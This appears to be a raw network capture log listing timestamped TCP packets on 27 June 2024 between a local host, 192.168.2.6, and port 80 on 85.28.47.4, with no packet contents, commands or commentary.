                                                                Jun 27, 2024 05:58:11.048825026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048830986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048841000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048846960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048857927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048861980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048870087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048877954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048882008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048893929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048894882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048906088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048918009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048918009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048928976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048942089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048943996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048953056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048964977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048964977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048976898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048978090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049000025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049021006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049773932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049786091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049796104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049807072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049808025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049818993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049829960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049833059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049844027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049854040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049860001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049870968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049880028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049881935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049892902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049894094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049906015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049917936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049918890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049930096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049941063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049942017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049953938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049964905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.049964905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.049989939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050715923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050728083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050739050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050750971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050754070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050761938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050772905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050781965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050784111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050796986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050808907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050820112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050820112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050832033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050837994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050843954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050853014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050854921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050865889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050875902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050878048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050889969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050899982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050900936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.050916910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.050930023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051656961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051668882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051680088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051688910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051692009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051704884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051708937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051716089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051727057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051733971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051738977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051748037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051749945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051762104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051773071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051772118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051784992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051795959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051796913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051810980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051814079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051822901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051827908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051835060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051846027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.051855087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.051878929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.052452087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.052464008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.052474976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.052488089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.052494049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.052510023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.052531958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133747101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133774996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133786917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133797884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133846045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133846045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133909941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133929014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133943081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133944035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133955002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133961916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133969069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.133976936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.133999109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134025097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134196997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134208918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134221077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134231091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134232998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134243965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134244919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134258032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134263039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134269953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134294987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134310961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134495020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134505033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134527922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134634018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134646893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134660006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134666920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134670973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134680033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134682894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134695053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134696007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134711981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134736061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134911060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134922981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134934902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134944916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134946108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.134957075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.134973049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135173082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135190964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135201931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135205030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135214090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135225058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135232925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135236025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135247946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135262966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135263920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135273933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135274887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135288954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135288954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135302067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135313034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135313034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135329962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135333061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135351896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135375023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135823011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135834932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135845900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135857105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135857105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135869026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.135869980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135888100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.135917902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.172964096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.177781105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347755909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347866058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347877979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.347881079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347893953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347907066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347908974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.347934008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.347949028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347961903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.347979069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.347999096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348028898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348040104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348067999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348090887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348098040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348110914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348154068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348154068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348191977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348229885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348261118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348274946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348299026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348313093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348433971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348447084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348459005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348472118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348473072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348485947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348495960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348500967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348509073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348520041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348536015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348555088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348709106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348751068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348771095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348783970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348794937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.348813057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348824978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.348833084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349020958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349034071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349044085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349056005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349062920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349067926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349080086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349085093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349092007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349102020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349104881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349117994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349128962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349159956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349442959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349455118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349481106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349504948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349598885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349611998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349623919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349633932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349637032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349643946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349648952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349662066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349663973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349673033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349684954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349689960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349695921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349703074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349713087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349713087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349724054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.349740982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.349756956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350430965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350444078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350455999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350466967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350469112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350481033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350492001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350496054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350508928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350518942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350519896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350532055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350537062 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350538015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350549936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350560904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350573063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350574017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.350590944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.350605965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351267099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351281881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351293087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351304054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351305008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351316929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351329088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351335049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351341963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351352930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351356030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351363897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351372957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351375103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351387024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351391077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351398945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351411104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351411104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351423979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351434946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351435900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351444960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351459026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351464033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351469994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.351475954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.351505995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352020979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352034092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352046013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352055073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352058887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352068901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352082014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352089882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352103949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352109909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352114916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352128029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352133989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352137089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.352139950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352144957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.352150917 CEST804971185.28.47.4192.168.2.6
